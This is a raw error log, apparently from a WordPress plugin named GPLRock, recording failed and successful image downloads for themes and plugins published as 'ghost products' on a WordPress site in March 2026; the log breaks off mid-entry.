12:01:23 UTC] GPLRock: Image download failed for product grav-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:23 UTC] GPLRock: Image download failed for product invia-responsive-corporate-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grav---creative-portfolio-wordpress-theme-31171.webp for product grav-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/invia-responsive-corporate-wp-theme-18843.webp for product invia-responsive-corporate-wp-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:25 UTC] GPLRock: Image download failed for product invia-responsive-corporate-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:25 UTC] GPLRock: Image download failed for product grav-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:27 UTC] GPLRock: Image download failed for product invia-responsive-corporate-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:27 UTC] GPLRock: Image download failed for product grav-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grav---creative-portfolio-wordpress-theme-31171.webp for product grav-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:29 UTC] GPLRock WARNING: Image download failed for product grav-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grav---creative-portfolio-wordpress-theme-31171.webp [22-Mar-2026 12:01:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/invia-responsive-corporate-wp-theme-18843.webp for product invia-responsive-corporate-wp-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:29 UTC] GPLRock WARNING: Image download failed for product invia-responsive-corporate-wp-theme. URL: https://meldwp.com/wp-content/uploads/invia-responsive-corporate-wp-theme-18843.webp [22-Mar-2026 12:01:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grav-creative-portfolio-wordpress-theme [22-Mar-2026 12:01:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: invia-responsive-corporate-wp-theme [22-Mar-2026 12:01:30 UTC] GPLRock: Image download failed for product lifevent-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:30 UTC] GPLRock: Image download failed for product magnet-creative-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:32 UTC] GPLRock: Image download failed for product lifevent-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:32 UTC] GPLRock: Image download failed for product magnet-creative-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lifevent---event-conference-wordpress-theme-2504.webp for product lifevent-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magnet---creative-business-wordpress-theme-3556.webp for product magnet-creative-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:34 UTC] GPLRock: Image download failed for product magnet-creative-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:34 UTC] GPLRock: Image download failed for product lifevent-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:36 UTC] GPLRock: Image download failed for product magnet-creative-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:36 UTC] GPLRock: Image download failed for product lifevent-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magnet---creative-business-wordpress-theme-3556.webp for product magnet-creative-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:38 UTC] GPLRock WARNING: Image download failed for product magnet-creative-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/magnet---creative-business-wordpress-theme-3556.webp [22-Mar-2026 12:01:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lifevent---event-conference-wordpress-theme-2504.webp for product lifevent-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:38 UTC] GPLRock WARNING: Image download failed for product lifevent-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lifevent---event-conference-wordpress-theme-2504.webp [22-Mar-2026 12:01:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: magnet-creative-business-wordpress-theme [22-Mar-2026 12:01:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lifevent-event-conference-wordpress-theme [22-Mar-2026 12:01:38 UTC] GPLRock: Image download failed for product creedy-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:38 UTC] GPLRock: Image download failed for product gameon-metaverse-project-launchpad-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:40 UTC] GPLRock: Image download failed for product creedy-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:40 UTC] GPLRock: Image download failed for product gameon-metaverse-project-launchpad-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creedy---religion-wordpress-theme-2068.webp for product creedy-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gameon---metaverse-project-launchpad-wordpress-theme-8656.webp for product gameon-metaverse-project-launchpad-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:42 UTC] GPLRock: Image download failed for product gameon-metaverse-project-launchpad-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:42 UTC] GPLRock: Image download failed for product creedy-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:45 UTC] GPLRock: Image download failed for product creedy-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:45 UTC] GPLRock: Image download failed for product gameon-metaverse-project-launchpad-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creedy---religion-wordpress-theme-2068.webp for product creedy-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:47 UTC] GPLRock WARNING: Image download failed for product creedy-religion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/creedy---religion-wordpress-theme-2068.webp [22-Mar-2026 12:01:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gameon---metaverse-project-launchpad-wordpress-theme-8656.webp for product gameon-metaverse-project-launchpad-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:47 UTC] GPLRock WARNING: Image download failed for product gameon-metaverse-project-launchpad-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gameon---metaverse-project-launchpad-wordpress-theme-8656.webp [22-Mar-2026 12:01:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: creedy-religion-wordpress-theme [22-Mar-2026 12:01:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gameon-metaverse-project-launchpad-wordpress-theme [22-Mar-2026 12:01:47 UTC] GPLRock: Image download failed for product amiso-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:47 UTC] GPLRock: Image download failed for product the-frog-creative-news-blog-magazine-front-end-submission-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:49 UTC] GPLRock: Image download failed for product amiso-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:49 UTC] GPLRock: Image download failed for product the-frog-creative-news-blog-magazine-front-end-submission-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amiso---design-agency-wordpress-theme-22583.webp for product amiso-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-frog--creative-news--blog-magazine--front-end-submission-wp-theme-3080.webp for product the-frog-creative-news-blog-magazine-front-end-submission-wp-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:51 UTC] GPLRock: Image download failed for product the-frog-creative-news-blog-magazine-front-end-submission-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:51 UTC] GPLRock: Image download failed for product amiso-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:53 UTC] GPLRock: Image download failed for product the-frog-creative-news-blog-magazine-front-end-submission-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:53 UTC] GPLRock: Image download failed for product amiso-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-frog--creative-news--blog-magazine--front-end-submission-wp-theme-3080.webp for product the-frog-creative-news-blog-magazine-front-end-submission-wp-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:55 UTC] GPLRock WARNING: Image download failed for product the-frog-creative-news-blog-magazine-front-end-submission-wp-theme. URL: https://meldwp.com/wp-content/uploads/the-frog--creative-news--blog-magazine--front-end-submission-wp-theme-3080.webp [22-Mar-2026 12:01:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-frog-creative-news-blog-magazine-front-end-submission-wp-theme [22-Mar-2026 12:01:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amiso---design-agency-wordpress-theme-22583.webp for product amiso-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:55 UTC] GPLRock WARNING: Image download failed for product amiso-design-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amiso---design-agency-wordpress-theme-22583.webp [22-Mar-2026 12:01:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amiso-design-agency-wordpress-theme [22-Mar-2026 12:01:55 UTC] GPLRock: Image download failed for product cynic-digital-agency-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:55 UTC] GPLRock: Image download failed for product paint-painting-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:58 UTC] GPLRock: Image download failed for product cynic-digital-agency-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:58 UTC] GPLRock: Image download failed for product paint-painting-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cynic---digital-agency-html-template-17002.webp for product cynic-digital-agency-html-template after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paint---painting-company-wordpress-theme-7114.webp for product paint-painting-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:00 UTC] GPLRock: Image download failed for product paint-painting-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:00 UTC] GPLRock: Image download failed for product cynic-digital-agency-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:02 UTC] GPLRock: Image download failed for product paint-painting-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:02 UTC] GPLRock: Image download failed for product cynic-digital-agency-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paint---painting-company-wordpress-theme-7114.webp for product paint-painting-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:04 UTC] GPLRock WARNING: Image download failed for product paint-painting-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/paint---painting-company-wordpress-theme-7114.webp [22-Mar-2026 12:02:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paint-painting-company-wordpress-theme [22-Mar-2026 12:02:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cynic---digital-agency-html-template-17002.webp for product cynic-digital-agency-html-template after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:04 UTC] GPLRock WARNING: Image download failed for product cynic-digital-agency-html-template. URL: https://meldwp.com/wp-content/uploads/cynic---digital-agency-html-template-17002.webp [22-Mar-2026 12:02:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cynic-digital-agency-html-template [22-Mar-2026 12:02:04 UTC] GPLRock: Image download failed for product techub-technology-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:04 UTC] GPLRock: Image download failed for product trophy-soccer-and-football-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:06 UTC] GPLRock: Image download failed for product techub-technology-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:06 UTC] GPLRock: Image download failed for product trophy-soccer-and-football-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techub--technology--it-solutions-wordpress-theme-21633.webp for product techub-technology-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trophy---soccer-and-football-club-wordpress-theme-14952.webp for product trophy-soccer-and-football-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:08 UTC] GPLRock: Image download failed for product techub-technology-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:08 UTC] GPLRock: Image download failed for product trophy-soccer-and-football-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:11 UTC] GPLRock: Image download failed for product trophy-soccer-and-football-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:11 UTC] GPLRock: Image download failed for product techub-technology-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trophy---soccer-and-football-club-wordpress-theme-14952.webp for product trophy-soccer-and-football-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:13 UTC] GPLRock WARNING: Image download failed for product trophy-soccer-and-football-club-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/trophy---soccer-and-football-club-wordpress-theme-14952.webp [22-Mar-2026 12:02:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: trophy-soccer-and-football-club-wordpress-theme [22-Mar-2026 12:02:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techub--technology--it-solutions-wordpress-theme-21633.webp for product techub-technology-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:13 UTC] GPLRock WARNING: Image download failed for product techub-technology-it-solutions-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/techub--technology--it-solutions-wordpress-theme-21633.webp [22-Mar-2026 12:02:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: techub-technology-it-solutions-wordpress-theme [22-Mar-2026 12:02:13 UTC] GPLRock: Image download failed for product doit-creative-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:13 UTC] GPLRock: Image download failed for product activity-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:15 UTC] GPLRock: Image download failed for product doit-creative-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:15 UTC] GPLRock: Image download failed for product activity-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doit---creative-multipurpose-theme-30639.webp for product doit-creative-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/activity---booking-wordpress-theme-9857.webp for product activity-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:17 UTC] GPLRock: Image download failed for product doit-creative-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:17 UTC] GPLRock: Image download failed for product activity-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:19 UTC] GPLRock: Image download failed for product doit-creative-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:19 UTC] GPLRock: Image download failed for product activity-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doit---creative-multipurpose-theme-30639.webp for product doit-creative-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:21 UTC] GPLRock WARNING: Image download failed for product doit-creative-multipurpose-theme. URL: https://meldwp.com/wp-content/uploads/doit---creative-multipurpose-theme-30639.webp [22-Mar-2026 12:02:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: doit-creative-multipurpose-theme [22-Mar-2026 12:02:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/activity---booking-wordpress-theme-9857.webp for product activity-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:21 UTC] GPLRock WARNING: Image download failed for product activity-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/activity---booking-wordpress-theme-9857.webp [22-Mar-2026 12:02:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: activity-booking-wordpress-theme [22-Mar-2026 12:02:21 UTC] GPLRock: Image download failed for product floria-gardening-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:24 UTC] GPLRock: Image download failed for product floria-gardening-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floria--gardening--landscaping-wordpress-theme-12239.webp for product floria-gardening-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:26 UTC] GPLRock: Image download failed for product floria-gardening-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:28 UTC] GPLRock: Image downloaded successfully for product wp-eventsplus-events-calendar-registration-booking (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eab63412.jpg [22-Mar-2026 12:02:28 UTC] GPLRock: Using pre-downloaded image for product wp-eventsplus-events-calendar-registration-booking: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eab63412.jpg [22-Mar-2026 12:02:28 UTC] GPLRock: Ghost product published with image - Product ID: wp-eventsplus-events-calendar-registration-booking [22-Mar-2026 12:02:28 UTC] GPLRock: Image download failed for product floria-gardening-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:02:29 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-bookmarks-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66af54cc.jpg [22-Mar-2026 12:02:29 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-bookmarks-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66af54cc.jpg [22-Mar-2026 12:02:29 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-bookmarks-addon [22-Mar-2026 12:02:30 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-google-translate (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58b70b97.jpg [22-Mar-2026 12:02:30 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-google-translate: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58b70b97.jpg [22-Mar-2026 12:02:30 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-google-translate [22-Mar-2026 12:02:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floria--gardening--landscaping-wordpress-theme-12239.webp for product floria-gardening-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:02:30 UTC] GPLRock WARNING: Image download failed for product floria-gardening-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/floria--gardening--landscaping-wordpress-theme-12239.webp [22-Mar-2026 12:02:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: floria-gardening-landscaping-wordpress-theme [22-Mar-2026 12:02:31 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-restrict-past-content (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b14ae232.jpg [22-Mar-2026 12:02:31 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-restrict-past-content: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b14ae232.jpg [22-Mar-2026 12:02:31 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-restrict-past-content [22-Mar-2026 12:02:34 UTC] GPLRock: Image downloaded successfully for product studiopress-eleven40-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d526fab.jpg [22-Mar-2026 12:02:34 UTC] GPLRock: Using pre-downloaded image for product studiopress-eleven40-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d526fab.jpg [22-Mar-2026 12:02:34 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-eleven40-pro-genesis-wordpress-theme [22-Mar-2026 12:02:36 UTC] GPLRock: Image downloaded successfully for product brixton-blog-a-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6ecb107.jpg [22-Mar-2026 12:02:36 UTC] GPLRock: Using pre-downloaded image for product brixton-blog-a-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6ecb107.jpg [22-Mar-2026 12:02:36 UTC] GPLRock: Ghost product published with image - Product ID: brixton-blog-a-responsive-wordpress-blog-theme [22-Mar-2026 12:02:37 UTC] GPLRock: Image downloaded successfully for product honshi-wordpress-elementor-theme-for-agencya (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d789caf.jpg [22-Mar-2026 12:02:37 UTC] GPLRock: Using pre-downloaded image for product honshi-wordpress-elementor-theme-for-agencya: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d789caf.jpg [22-Mar-2026 12:02:37 UTC] GPLRock: Ghost product published with image - Product ID: honshi-wordpress-elementor-theme-for-agencya [22-Mar-2026 12:02:39 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-magnifier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58a20e14.jpg [22-Mar-2026 12:02:39 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-magnifier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58a20e14.jpg [22-Mar-2026 12:02:39 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-magnifier [22-Mar-2026 12:02:40 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-google-maps (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6676969e.jpg [22-Mar-2026 12:02:40 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-google-maps: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6676969e.jpg [22-Mar-2026 12:02:40 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-google-maps [22-Mar-2026 12:02:41 UTC] GPLRock: Image downloaded successfully for product studiopress-cafe-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b3db178.jpg [22-Mar-2026 12:02:41 UTC] GPLRock: Using pre-downloaded image for product studiopress-cafe-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b3db178.jpg [22-Mar-2026 12:02:41 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-cafe-pro-genesis-wordpress-theme [22-Mar-2026 12:03:35 UTC] GPLRock: Image downloaded successfully for product pokeri-casino-betting-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ae2f199.jpg [22-Mar-2026 12:03:35 UTC] GPLRock: Using pre-downloaded image for product pokeri-casino-betting-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ae2f199.jpg [22-Mar-2026 12:03:35 UTC] GPLRock: Ghost product published with image - Product ID: pokeri-casino-betting-elementor-pro-template-kit [22-Mar-2026 12:03:36 UTC] GPLRock: Image downloaded successfully for product still-steel-factory-manufacturing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-759213ca.jpg [22-Mar-2026 12:03:37 UTC] GPLRock: Using pre-downloaded image for product still-steel-factory-manufacturing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-759213ca.jpg [22-Mar-2026 12:03:37 UTC] GPLRock: Ghost product published with image - Product ID: still-steel-factory-manufacturing-elementor-template-kit [22-Mar-2026 12:03:39 UTC] GPLRock: Image downloaded successfully for product streamvid-video-streaming-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07f51f70.png [22-Mar-2026 12:03:39 UTC] GPLRock: Using pre-downloaded image for product streamvid-video-streaming-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07f51f70.png [22-Mar-2026 12:03:39 UTC] GPLRock: Ghost product published with image - Product ID: streamvid-video-streaming-wordpress-theme [22-Mar-2026 12:03:40 UTC] GPLRock: Image downloaded successfully for product partdo-auto-parts-and-tools-shop-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a622a31.png [22-Mar-2026 12:03:40 UTC] GPLRock: Using pre-downloaded image for product partdo-auto-parts-and-tools-shop-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a622a31.png [22-Mar-2026 12:03:40 UTC] GPLRock: Ghost product published with image - Product ID: partdo-auto-parts-and-tools-shop-woocommerce-theme [22-Mar-2026 12:03:42 UTC] GPLRock: Image downloaded successfully for product organify-organic-food-products-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fee304ce.png [22-Mar-2026 12:03:42 UTC] GPLRock: Using pre-downloaded image for product organify-organic-food-products-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fee304ce.png [22-Mar-2026 12:03:42 UTC] GPLRock: Ghost product published with image - Product ID: organify-organic-food-products-wordpress-theme [22-Mar-2026 12:03:44 UTC] GPLRock: Image downloaded successfully for product artistic-digital-marketing-agency-wordpress-theme (attempt 1) to: 